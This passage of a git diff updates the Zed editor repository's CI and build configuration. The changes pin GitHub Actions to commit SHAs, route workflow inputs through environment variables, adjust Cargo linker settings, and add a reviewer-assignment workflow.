diff --git a/.cargo/ci-config.toml b/.cargo/ci-config.toml index b31b79a59b262a5cc18cf1d2b32124a97bab4fc7..6a5feece648a39be39e99fa3eb5807713b911348 100644 --- a/.cargo/ci-config.toml +++ b/.cargo/ci-config.toml @@ -15,14 +15,4 @@ rustflags = ["-D", "warnings"] [profile.dev] debug = "limited" -# Use Mold on Linux, because it's faster than GNU ld and LLD. -# -# We no longer set this in the default `config.toml` so that developers can opt in to Wild, which -# is faster than Mold, in their own ~/.cargo/config.toml. -[target.x86_64-unknown-linux-gnu] -linker = "clang" -rustflags = ["-C", "link-arg=-fuse-ld=mold"] -[target.aarch64-unknown-linux-gnu] -linker = "clang" -rustflags = ["-C", "link-arg=-fuse-ld=mold"] diff --git a/.cargo/config.toml b/.cargo/config.toml index 9b2e6f51c96e3ae98a54bbb11524210911d0e262..a9bf1f9cc975cf812605e88379def0ab334f76ad 100644 --- a/.cargo/config.toml +++ b/.cargo/config.toml @@ -16,5 +16,9 @@ rustflags = [ "target-feature=+crt-static", # This fixes the linking issue when compiling livekit on Windows ] +# We need lld to link libwebrtc.a successfully on aarch64-linux +[target.aarch64-unknown-linux-gnu] +rustflags = ["-C", "link-arg=-fuse-ld=lld"] + [env] MACOSX_DEPLOYMENT_TARGET = "10.15.7" diff --git a/.config/nextest.toml b/.config/nextest.toml index ab03abd839600e1a84ebd5eea9709f60cea1c7f0..b18a3f31e4a75af0636b4d8d8fdd81f48d8d93e6 100644 --- a/.config/nextest.toml +++ b/.config/nextest.toml @@ -42,3 +42,7 @@ slow-timeout = { period = "300s", terminate-after = 1 } [[profile.default.overrides]] filter = 'package(editor) and test(test_random_split_editor)' slow-timeout = { period = "300s", terminate-after = 1 } + +[[profile.default.overrides]] +filter = 'package(editor) and test(test_random_blocks)' +slow-timeout = { period = "300s", terminate-after = 1 } diff --git a/.git-blame-ignore-revs b/.git-blame-ignore-revs index fbcc76a8654f7ed2241fb05c305eb466e3177c20..2650e36997655b1ab7376e8ed7052a8fc24b2fc6 100644 --- a/.git-blame-ignore-revs 
+++ b/.git-blame-ignore-revs @@ -34,3 +34,11 @@ ffdda588b41f7d9d270ffe76cab116f828ad545e # 2024-07-24 docs: Format docs # https://github.com/zed-industries/zed/pull/15352 3a44a59f8ec114ac1ba22f7da1652717ef7e4e5c + +# 2026-02-27 Format Tree-sitter query files +# https://github.com/zed-industries/zed/pull/50138 +5ed538f49c54ca464bb9d1e59446060a3a925668 + +# 2026-02-28 Format proto files +# https://github.com/zed-industries/zed/pull/50413 +56a88a848be09cbcb66bcb3d85ec1f5644909f72 diff --git a/.github/CODEOWNERS.hold b/.github/CODEOWNERS.hold index 449a5fd07315845787c9f2a73f0a0a22608e92c3..c0dec880c718d4edbee4015876fa57c41d951c15 100644 --- a/.github/CODEOWNERS.hold +++ b/.github/CODEOWNERS.hold @@ -32,9 +32,6 @@ /crates/agent_ui/ @zed-industries/ai-team /crates/ai_onboarding/ @zed-industries/ai-team /crates/anthropic/ @zed-industries/ai-team -/crates/assistant_slash_command/ @zed-industries/ai-team -/crates/assistant_slash_commands/ @zed-industries/ai-team -/crates/assistant_text_thread/ @zed-industries/ai-team /crates/bedrock/ @zed-industries/ai-team /crates/cloud_llm_client/ @zed-industries/ai-team /crates/codestral/ @zed-industries/ai-team @@ -48,7 +45,6 @@ /crates/edit_prediction_context/ @zed-industries/ai-team /crates/edit_prediction_types/ @zed-industries/ai-team /crates/edit_prediction_ui/ @zed-industries/ai-team -/crates/eval/ @zed-industries/ai-team /crates/eval_utils/ @zed-industries/ai-team /crates/google_ai/ @zed-industries/ai-team /crates/language_model/ @zed-industries/ai-team @@ -62,8 +58,6 @@ /crates/rules_library/ @zed-industries/ai-team # SUGGESTED: Review needed - based on Richard Feldman (2 commits) /crates/shell_command_parser/ @zed-industries/ai-team -/crates/supermaven/ @zed-industries/ai-team -/crates/supermaven_api/ @zed-industries/ai-team /crates/vercel/ @zed-industries/ai-team /crates/x_ai/ @zed-industries/ai-team /crates/zeta_prompt/ @zed-industries/ai-team @@ -167,7 +161,6 @@ /extensions/glsl/ @zed-industries/ecosystem-team 
/extensions/html/ @zed-industries/ecosystem-team /extensions/proto/ @zed-industries/ecosystem-team -/extensions/slash-commands-example/ @zed-industries/ecosystem-team /extensions/test-extension/ @zed-industries/ecosystem-team /extensions/workflows/ @zed-industries/ecosystem-team diff --git a/.github/DISCUSSION_TEMPLATE/feature-requests.yml b/.github/DISCUSSION_TEMPLATE/feature-requests.yml index 183a3de934eccc8baa8428e822176e31d1d11782..e8a695063c34771ac6120b1e477b7494a17aa3c9 100644 --- a/.github/DISCUSSION_TEMPLATE/feature-requests.yml +++ b/.github/DISCUSSION_TEMPLATE/feature-requests.yml @@ -40,4 +40,4 @@ body: attributes: value: | Learn more about how feature requests work in our - [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/47963). + [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/51422). diff --git a/.github/ISSUE_TEMPLATE/10_bug_report.yml b/.github/ISSUE_TEMPLATE/10_bug_report.yml index 13e43219dd65a78af4afec479330bbc5fd85fe42..5eb8e8a6299c5189384b6d060e12cd61a2249a3c 100644 --- a/.github/ISSUE_TEMPLATE/10_bug_report.yml +++ b/.github/ISSUE_TEMPLATE/10_bug_report.yml @@ -100,7 +100,7 @@ body: label: (for AI issues) Model provider details placeholder: | - Provider: (Anthropic via ZedPro, Anthropic via API key, Copilot Chat, Mistral, OpenAI, etc.) 
- - Model Name: (Claude Sonnet 4.5, Gemini 3 Pro, GPT-5) + - Model Name: (Claude Sonnet 4.5, Gemini 3.1 Pro, GPT-5) - Mode: (Agent Panel, Inline Assistant, Terminal Assistant or Text Threads) - Other details (ACPs, MCPs, other settings, etc.): validations: diff --git a/.github/actions/run_tests/action.yml b/.github/actions/run_tests/action.yml index a071aba3a87dcf8e8f48f740115cfddf48b9f805..610c334a65c3a3817ab0ee2bb7356a923643092b 100644 --- a/.github/actions/run_tests/action.yml +++ b/.github/actions/run_tests/action.yml @@ -5,7 +5,7 @@ runs: using: "composite" steps: - name: Install nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c # nextest - name: Install Node uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4 diff --git a/.github/actions/run_tests_windows/action.yml b/.github/actions/run_tests_windows/action.yml index 307b73f363b7d5fd7a3c9e5082c4f17d622ec165..3752cbb50d538459ea58d2219e591d1abbda6247 100644 --- a/.github/actions/run_tests_windows/action.yml +++ b/.github/actions/run_tests_windows/action.yml @@ -12,7 +12,7 @@ runs: steps: - name: Install test runner working-directory: ${{ inputs.working-directory }} - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c # nextest - name: Install Node uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4 diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md index 4470b5763fcf84f54ea1b0ef7c2f7bf9786eaaca..a56793ad6222e5788621f6c8a430205e9ad848d7 100644 --- a/.github/pull_request_template.md +++ b/.github/pull_request_template.md @@ -1,10 +1,13 @@ -Closes #ISSUE +Self-Review Checklist: + +- [ ] I've reviewed my own diff for quality, security, and reliability +- [ ] Unsafe blocks (if any) have justifying comments +- [ ] The content is consistent with the [UI/UX 
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) +- [ ] Tests cover the new/changed behavior +- [ ] Performance impact has been considered and is acceptable -Before you mark this PR as ready for review, make sure that you have: -- [ ] Added a solid test coverage and/or screenshots from doing manual testing -- [ ] Done a self-review taking into account security and performance aspects -- [ ] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) +Closes #ISSUE Release Notes: -- N/A *or* Added/Fixed/Improved ... +- N/A or Added/Fixed/Improved ... diff --git a/.github/workflows/add_commented_closed_issue_to_project.yml b/.github/workflows/add_commented_closed_issue_to_project.yml index 5871f5ae0e61f97557ce926c4a2627841f50560d..27315e7160200dc323899b58d5c307aae656d5c6 100644 --- a/.github/workflows/add_commented_closed_issue_to_project.yml +++ b/.github/workflows/add_commented_closed_issue_to_project.yml @@ -35,7 +35,7 @@ jobs: - if: steps.is-post-close-comment.outputs.result == 'true' id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v2.1.4 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} @@ -63,13 +63,18 @@ jobs: } - if: steps.is-post-close-comment.outputs.result == 'true' && steps.check-staff.outputs.result == 'true' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} run: | - echo "::notice::Skipping issue #${{ github.event.issue.number }} - commenter is staff member" + echo "::notice::Skipping issue #$ISSUE_NUMBER - commenter is staff member" # github-script outputs are JSON strings, so we compare against 'false' (string) - if: steps.is-post-close-comment.outputs.result == 'true' && steps.check-staff.outputs.result == 'false' + env: + ISSUE_NUMBER: 
${{ github.event.issue.number }} + COMMENT_USER_LOGIN: ${{ github.event.comment.user.login }} run: | - echo "::notice::Adding issue #${{ github.event.issue.number }} to project (comment by ${{ github.event.comment.user.login }})" + echo "::notice::Adding issue #$ISSUE_NUMBER to project (comment by $COMMENT_USER_LOGIN)" - if: steps.is-post-close-comment.outputs.result == 'true' && steps.check-staff.outputs.result == 'false' uses: actions/add-to-project@244f685bbc3b7adfa8466e08b698b5577571133e # v1.0.2 diff --git a/.github/workflows/after_release.yml b/.github/workflows/after_release.yml index 9582e3f1956b3ecda383fc03efdb3d7ff67eaa68..ab2220764861b17317f1fa3971ecf2aa9b645c8d 100644 --- a/.github/workflows/after_release.yml +++ b/.github/workflows/after_release.yml @@ -27,7 +27,7 @@ jobs: - name: after_release::rebuild_releases_page::refresh_cloud_releases run: curl -fX POST https://cloud.zed.dev/releases/refresh?expect_tag=${{ github.event.release.tag_name || inputs.tag_name }} - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: after_release::rebuild_releases_page::redeploy_zed_dev @@ -76,7 +76,7 @@ jobs: "X-GitHub-Api-Version" = "2022-11-28" } $body = @{ branch = "master" } | ConvertTo-Json - $uri = "https://api.github.com/repos/${{ github.repository_owner }}/winget-pkgs/merge-upstream" + $uri = "https://api.github.com/repos/$env:GITHUB_REPOSITORY_OWNER/winget-pkgs/merge-upstream" try { Invoke-RestMethod -Uri $uri -Method Post -Headers $headers -Body $body -ContentType "application/json" Write-Host "Successfully synced winget-pkgs fork" @@ -110,7 +110,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: release::create_sentry_release @@ 
-131,11 +131,10 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: release::send_slack_message - run: | - curl -X POST -H 'Content-type: application/json'\ - --data '{"text":"❌ ${{ github.workflow }} failed: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}"}' "$SLACK_WEBHOOK" + run: 'curl -X POST -H ''Content-type: application/json'' --data "$(jq -n --arg text "$SLACK_MESSAGE" ''{"text": $text}'')" "$SLACK_WEBHOOK"' env: SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + SLACK_MESSAGE: '❌ ${{ github.workflow }} failed: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}' defaults: run: shell: bash -euxo pipefail {0} diff --git a/.github/workflows/assign-reviewers.yml b/.github/workflows/assign-reviewers.yml new file mode 100644 index 0000000000000000000000000000000000000000..2a12a69defdd4f8933f1c549f0624d9bdcc9fd40 --- /dev/null +++ b/.github/workflows/assign-reviewers.yml @@ -0,0 +1,104 @@ +# Assign Reviewers — Smart team assignment based on diff weight +# +# Triggers on PR open and ready_for_review events. Checks out the coordinator +# repo (zed-industries/codeowner-coordinator) to access the assignment script and rules, +# then assigns the 1-2 most relevant teams as reviewers. +# +# NOTE: This file is stored in the codeowner-coordinator repo but must be deployed to +# the zed repo at .github/workflows/assign-reviewers.yml. See INSTALL.md. +# +# AUTH NOTE: Uses a GitHub App (COORDINATOR_APP_ID + COORDINATOR_APP_PRIVATE_KEY) +# for all API operations: cloning the private coordinator repo, requesting team +# reviewers, and setting PR assignees. GITHUB_TOKEN is not used. +# +# SECURITY INVARIANTS (pull_request_target): +# This workflow runs with access to secrets for ALL PRs including forks. +# It is safe ONLY because: +# 1. The checkout is the coordinator repo at ref: main — NEVER the PR head/branch +# 2. 
No ${{ }} interpolation of event fields in run: blocks — all routed via env: +# 3. The script never executes, sources, or reads files from the PR branch +# Violating any of these enables remote code execution with secret access. + +name: Assign Reviewers + +on: + # zizmor: ignore[dangerous-triggers] reviewed — no PR code checkout, only coordinator repo at ref: main + pull_request_target: + types: [opened, ready_for_review] + +# GITHUB_TOKEN is not used — all operations use the GitHub App token. +# Declare minimal permissions so the default token has no write access. +permissions: {} + +# Prevent duplicate runs for the same PR (e.g., rapid push + ready_for_review). +concurrency: + group: assign-reviewers-${{ github.event.pull_request.number }} + cancel-in-progress: true + +# NOTE: For ready_for_review events, the webhook payload may still carry +# draft: true due to a GitHub race condition (payload serialized before DB +# update). We trust the event type instead — the script rechecks draft status +# via a live API call as defense-in-depth. +# +# No author_association filter — external and fork PRs also get reviewer +# assignments. Assigned reviewers are inherently scoped to org team members +# by the GitHub Teams API. +jobs: + assign-reviewers: + if: >- + github.event.action == 'ready_for_review' || github.event.pull_request.draft == false + runs-on: ubuntu-latest + steps: + - name: Generate app token + id: app-token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 + with: + app-id: ${{ vars.COORDINATOR_APP_ID }} + private-key: ${{ secrets.COORDINATOR_APP_PRIVATE_KEY }} + repositories: codeowner-coordinator,zed + + # SECURITY: checks out the coordinator repo at ref: main, NOT the PR branch. + # persist-credentials: false prevents the token from leaking into .git/config. 
+ - name: Checkout coordinator repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 + with: + repository: zed-industries/codeowner-coordinator + ref: main + path: codeowner-coordinator + token: ${{ steps.app-token.outputs.token }} + persist-credentials: false + + - name: Setup Python + uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0 + with: + python-version: "3.11" + + - name: Install dependencies + run: | + pip install --no-deps -q --only-binary ':all:' \ + -r /dev/stdin <<< "pyyaml==6.0.3 --hash=sha256:b8bb0864c5a28024fac8a632c443c87c5aa6f215c0b126c449ae1a150412f31d" + + - name: Assign reviewers + env: + GH_TOKEN: ${{ steps.app-token.outputs.token }} + PR_URL: ${{ github.event.pull_request.html_url }} + TARGET_REPO: ${{ github.repository }} + ASSIGN_INTERNAL: ${{ vars.ASSIGN_INTERNAL || 'false' }} + ASSIGN_EXTERNAL: ${{ vars.ASSIGN_EXTERNAL || 'true' }} + run: | + cd codeowner-coordinator + python .github/scripts/assign-reviewers.py \ + --pr "$PR_URL" \ + --apply \ + --rules-file team-membership-rules.yml \ + --repo "$TARGET_REPO" \ + --org zed-industries \ + 2>&1 | tee /tmp/assign-reviewers-output.txt + + - name: Upload output + if: always() + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2 + with: + name: assign-reviewers-output + path: /tmp/assign-reviewers-output.txt + retention-days: 30 diff --git a/.github/workflows/autofix_pr.yml b/.github/workflows/autofix_pr.yml index 60cc66294af2cf65e17aaad530a9df511ec61503..717c5e2fa5e3c35f3ff33d176f73022e7a0c95d4 100644 --- a/.github/workflows/autofix_pr.yml +++ b/.github/workflows/autofix_pr.yml @@ -18,26 +18,25 @@ jobs: runs-on: namespace-profile-16x32-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: autofix_pr::run_autofix::checkout_pr - run: gh pr checkout ${{ 
inputs.pr_number }} + run: gh pr checkout "$PR_NUMBER" env: + PR_NUMBER: ${{ inputs.pr_number }} GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - name: steps::setup_cargo_config run: | mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_pnpm @@ -92,21 +91,24 @@ jobs: if: needs.run_autofix.outputs.has_changes == 'true' runs-on: namespace-profile-2x4-ubuntu-2404 steps: - - id: get-app-token + - id: generate-token name: steps::authenticate_as_zippy - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + permission-contents: write + permission-workflows: write - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - token: ${{ steps.get-app-token.outputs.token }} + token: ${{ steps.generate-token.outputs.token }} - name: autofix_pr::commit_changes::checkout_pr - run: gh pr checkout ${{ inputs.pr_number }} + run: gh pr checkout "$PR_NUMBER" env: - GITHUB_TOKEN: ${{ steps.get-app-token.outputs.token }} + PR_NUMBER: ${{ inputs.pr_number }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} - name: autofix_pr::download_patch_artifact uses: actions/download-artifact@018cc2cf5baa6db3ef3c5f8a56943fffe632ef53 with: @@ -122,7 +124,7 @@ jobs: GIT_COMMITTER_EMAIL: 234243425+zed-zippy[bot]@users.noreply.github.com GIT_AUTHOR_NAME: Zed 
Zippy GIT_AUTHOR_EMAIL: 234243425+zed-zippy[bot]@users.noreply.github.com - GITHUB_TOKEN: ${{ steps.get-app-token.outputs.token }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} concurrency: group: ${{ github.workflow }}-${{ inputs.pr_number }} cancel-in-progress: true diff --git a/.github/workflows/background_agent_mvp.yml b/.github/workflows/background_agent_mvp.yml index 528600138243cb8aca2e0fe0645eda198fc4f2b2..2f048d572df6fb45368c6d7aece574e83c9e7949 100644 --- a/.github/workflows/background_agent_mvp.yml +++ b/.github/workflows/background_agent_mvp.yml @@ -38,7 +38,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: fetch-depth: 0 @@ -50,7 +50,7 @@ jobs: "${HOME}/.local/bin/droid" --version - name: Setup Python - uses: actions/setup-python@v5 + uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5 with: python-version: "3.12" diff --git a/.github/workflows/bump_collab_staging.yml b/.github/workflows/bump_collab_staging.yml index d400905b4da3304a8b916d3a38ae9d8a2855dbf5..4f9724439f37b276de625e5810c777c12f20e4b9 100644 --- a/.github/workflows/bump_collab_staging.yml +++ b/.github/workflows/bump_collab_staging.yml @@ -11,7 +11,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: fetch-depth: 0 diff --git a/.github/workflows/bump_patch_version.yml b/.github/workflows/bump_patch_version.yml index 480d8b0ada98e859d2e72b49a39805ffe8f72b25..6b2fa66147b656efd9c8e28cd43cd2e010930dd1 100644 --- a/.github/workflows/bump_patch_version.yml +++ b/.github/workflows/bump_patch_version.yml @@ -13,18 +13,18 @@ jobs: if: github.repository_owner == 'zed-industries' runs-on: namespace-profile-16x32-ubuntu-2204 steps: - - id: get-app-token + - id: generate-token 
name: steps::authenticate_as_zippy - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - token: ${{ steps.get-app-token.outputs.token }} ref: ${{ inputs.branch }} + token: ${{ steps.generate-token.outputs.token }} - name: bump_patch_version::run_bump_patch_version::bump_patch_version run: | channel="$(cat crates/zed/RELEASE_CHANNEL)" @@ -51,7 +51,7 @@ jobs: GIT_COMMITTER_EMAIL: 234243425+zed-zippy[bot]@users.noreply.github.com GIT_AUTHOR_NAME: Zed Zippy GIT_AUTHOR_EMAIL: 234243425+zed-zippy[bot]@users.noreply.github.com - GITHUB_TOKEN: ${{ steps.get-app-token.outputs.token }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} concurrency: group: ${{ github.workflow }}-${{ inputs.branch }} cancel-in-progress: true diff --git a/.github/workflows/catch_blank_issues.yml b/.github/workflows/catch_blank_issues.yml index dd425afc886e86c1217a94e90eabced013f66bf0..dbceac5a196f2dc9c0963e491bd346dc8c0eff51 100644 --- a/.github/workflows/catch_blank_issues.yml +++ b/.github/workflows/catch_blank_issues.yml @@ -16,7 +16,7 @@ jobs: timeout-minutes: 5 steps: - id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v2.1.4 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} @@ -42,8 +42,10 @@ jobs: } - if: steps.check-staff.outputs.result == 'true' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} run: | - echo "::notice::Skipping issue #${{ github.event.issue.number }} - actor is staff member" 
+ echo "::notice::Skipping issue #$ISSUE_NUMBER - actor is staff member" - if: steps.check-staff.outputs.result == 'false' id: add-label diff --git a/.github/workflows/cherry_pick.yml b/.github/workflows/cherry_pick.yml index 9d46f300b509347b2853c00575c4e82fd9a2863c..ed0800dc5bbf1ec59182e9d24753e9b5112c4d13 100644 --- a/.github/workflows/cherry_pick.yml +++ b/.github/workflows/cherry_pick.yml @@ -26,21 +26,27 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - - id: get-app-token + - id: generate-token name: steps::authenticate_as_zippy - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + permission-contents: write + permission-workflows: write + permission-pull-requests: write - name: cherry_pick::run_cherry_pick::cherry_pick - run: ./script/cherry-pick ${{ inputs.branch }} ${{ inputs.commit }} ${{ inputs.channel }} + run: ./script/cherry-pick "$BRANCH" "$COMMIT" "$CHANNEL" env: + BRANCH: ${{ inputs.branch }} + COMMIT: ${{ inputs.commit }} + CHANNEL: ${{ inputs.channel }} GIT_COMMITTER_NAME: Zed Zippy GIT_COMMITTER_EMAIL: hi@zed.dev - GITHUB_TOKEN: ${{ steps.get-app-token.outputs.token }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} defaults: run: shell: bash -euxo pipefail {0} diff --git a/.github/workflows/comment_on_potential_duplicate_issues.yml b/.github/workflows/comment_on_potential_duplicate_issues.yml index de51cb1105c98901237ec88d47c34c69ea5c8080..0d7ce3aad3ce9deacfedfe1d237c41127a639da0 100644 --- a/.github/workflows/comment_on_potential_duplicate_issues.yml +++ b/.github/workflows/comment_on_potential_duplicate_issues.yml @@ -27,14 +27,14 @@ jobs: 
steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: sparse-checkout: script/github-check-new-issue-for-duplicates.py sparse-checkout-cone-mode: false - name: Get github app token id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v1.11.7 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} diff --git a/.github/workflows/community_champion_auto_labeler.yml b/.github/workflows/community_champion_auto_labeler.yml index fa44afc16dcaee4c1e1176b9344aed476ac6d8e5..82a9e274d64725b0e55c6ced46ca64ac3890e35e 100644 --- a/.github/workflows/community_champion_auto_labeler.yml +++ b/.github/workflows/community_champion_auto_labeler.yml @@ -12,7 +12,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: Check if author is a community champion and apply label - uses: actions/github-script@v7 + uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b # v7 env: COMMUNITY_CHAMPIONS: | 0x2CA diff --git a/.github/workflows/community_update_all_top_ranking_issues.yml b/.github/workflows/community_update_all_top_ranking_issues.yml index 59926f35563a4b21e3486ecbd454a4ccf951461e..b8003a69b243c3cafbf40857c653fb03f515eeec 100644 --- a/.github/workflows/community_update_all_top_ranking_issues.yml +++ b/.github/workflows/community_update_all_top_ranking_issues.yml @@ -10,7 +10,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 if: github.repository == 'zed-industries/zed' steps: - - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + - uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 - name: Set up uv uses: astral-sh/setup-uv@caf0cab7a618c569241d31dcd442f54681755d39 # v3 with: @@ -22,4 +22,6 
@@ jobs: - name: Install dependencies run: uv sync --project script/update_top_ranking_issues -p 3.13 - name: Run script - run: uv run --project script/update_top_ranking_issues script/update_top_ranking_issues/main.py --github-token ${{ secrets.GITHUB_TOKEN }} --issue-reference-number 5393 + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: uv run --project script/update_top_ranking_issues script/update_top_ranking_issues/main.py --github-token "$GITHUB_TOKEN" --issue-reference-number 5393 diff --git a/.github/workflows/community_update_weekly_top_ranking_issues.yml b/.github/workflows/community_update_weekly_top_ranking_issues.yml index 75ba66b934b5861bd51aef4238a1a4188dddefc3..90d1934ffcb6d5d711896d3902b70599e4b06872 100644 --- a/.github/workflows/community_update_weekly_top_ranking_issues.yml +++ b/.github/workflows/community_update_weekly_top_ranking_issues.yml @@ -10,7 +10,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 if: github.repository == 'zed-industries/zed' steps: - - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + - uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 - name: Set up uv uses: astral-sh/setup-uv@caf0cab7a618c569241d31dcd442f54681755d39 # v3 with: @@ -22,4 +22,6 @@ jobs: - name: Install dependencies run: uv sync --project script/update_top_ranking_issues -p 3.13 - name: Run script - run: uv run --project script/update_top_ranking_issues script/update_top_ranking_issues/main.py --github-token ${{ secrets.GITHUB_TOKEN }} --issue-reference-number 6952 --query-day-interval 7 + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: uv run --project script/update_top_ranking_issues script/update_top_ranking_issues/main.py --github-token "$GITHUB_TOKEN" --issue-reference-number 6952 --query-day-interval 7 diff --git a/.github/workflows/compare_perf.yml b/.github/workflows/compare_perf.yml index e5a2d4f9c928eac2d1b1cf54ed374f8b0cca5d25..2b2154ce9bd14c85d0f0d10e95c4065a458006a1 100644 --- 
